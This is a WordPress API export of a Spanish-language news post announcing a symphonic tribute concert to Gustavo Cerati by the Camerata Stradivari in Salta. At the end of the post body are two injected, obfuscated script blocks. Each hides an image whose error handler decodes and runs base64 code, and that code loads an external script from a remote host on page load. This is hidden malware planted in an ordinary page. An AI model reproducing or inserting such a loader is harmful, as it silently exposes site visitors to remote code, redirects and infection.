{"id":1993,"date":"2022-12-26T14:51:41","date_gmt":"2022-12-26T17:51:41","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1993"},"modified":"2025-08-14T00:27:08","modified_gmt":"2025-08-14T03:27:08","slug":"la-camerata-stradivari-presentara-homenaje-sinfonico-a-gustavo-cerati","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1993","title":{"rendered":"La Camerata Stradivari presentar\u00e1 \u00abHomenaje Sinf\u00f3nico a Gustavo Cerati\u201d"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#594307\"><em>Este martes 27 de diciembre a las 21, la Camerata Stradivari ofrecer\u00e1 un nuevo Homenaje Sinf\u00f3nico a un Grande del Rock nacional argentino \u201cGustavo Cerati\u201d en el Teatro Provincial Juan Carlos Saravia.<\/em><\/h4>\n\n\n\n<p>Con nuevo repertorio y nuevas canciones, la Camerata Stradivari volver\u00e1 al escenario del Teatro Provincial, Zuvir\u00eda 70, para brindar uno de los conciertos m\u00e1s esperados de su repertorio. El concierto ser\u00e1 este&nbsp;martes 27 a las 21.<\/p>\n\n\n\n<p>Bajo la direcci\u00f3n de la Maestra Inga Iordanishvilli, la sonoridad del Homenaje Sinf\u00f3nico propone un paseo emotivo por las canciones inmortales de Gustavo Cerati, con un gran respeto por las interpretaciones originales.<\/p>\n\n\n\n<p>Para concretar este proyecto la Fundaci\u00f3n Camerata Stradivari, contar\u00e1 con m\u00e1s de 40 m\u00fasicos en escena y cantantes invitados.<\/p>\n\n\n\n<p>\u00abFundaci\u00f3n Camerata Stradivari\u00bb, bajo la direcci\u00f3n de la Maestra Inga Iordanishvili, es un proyecto inclusivo e integrador que brinda formaci\u00f3n y perfeccionamiento en diversos instrumentos a trav\u00e9s de su Orquesta Sinf\u00f3nica, su Orquesta de c\u00e1mara y Coro.\u00bb<\/p>\n\n\n\n<p>Las entradas est\u00e1n a la venta https:\/\/www.saltaticket.gob.ar y en boleter\u00edas del Teatro<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-camerata-stradivari-presentara-homenaje-sinfonico-a-gustavo-cerati-86999\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este martes 27 de diciembre a las 21, la Camerata Stradivari ofrecer\u00e1 un nuevo Homenaje Sinf\u00f3nico a un Grande del Rock nacional argentino \u201cGustavo Cerati\u201d en el Teatro Provincial Juan Carlos Saravia. Con nuevo repertorio y nuevas canciones, la Camerata Stradivari volver\u00e1 al escenario del Teatro Provincial, Zuvir\u00eda 70, para brindar uno de los conciertos [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1994,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,13],"tags":[],"class_list":{"0":"post-1993","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1993"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1993"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1993\/revisions"}],"predecessor-version":[{"id":7231,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1993\/revisions\/7231"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1994"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1993"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1993"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1993"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}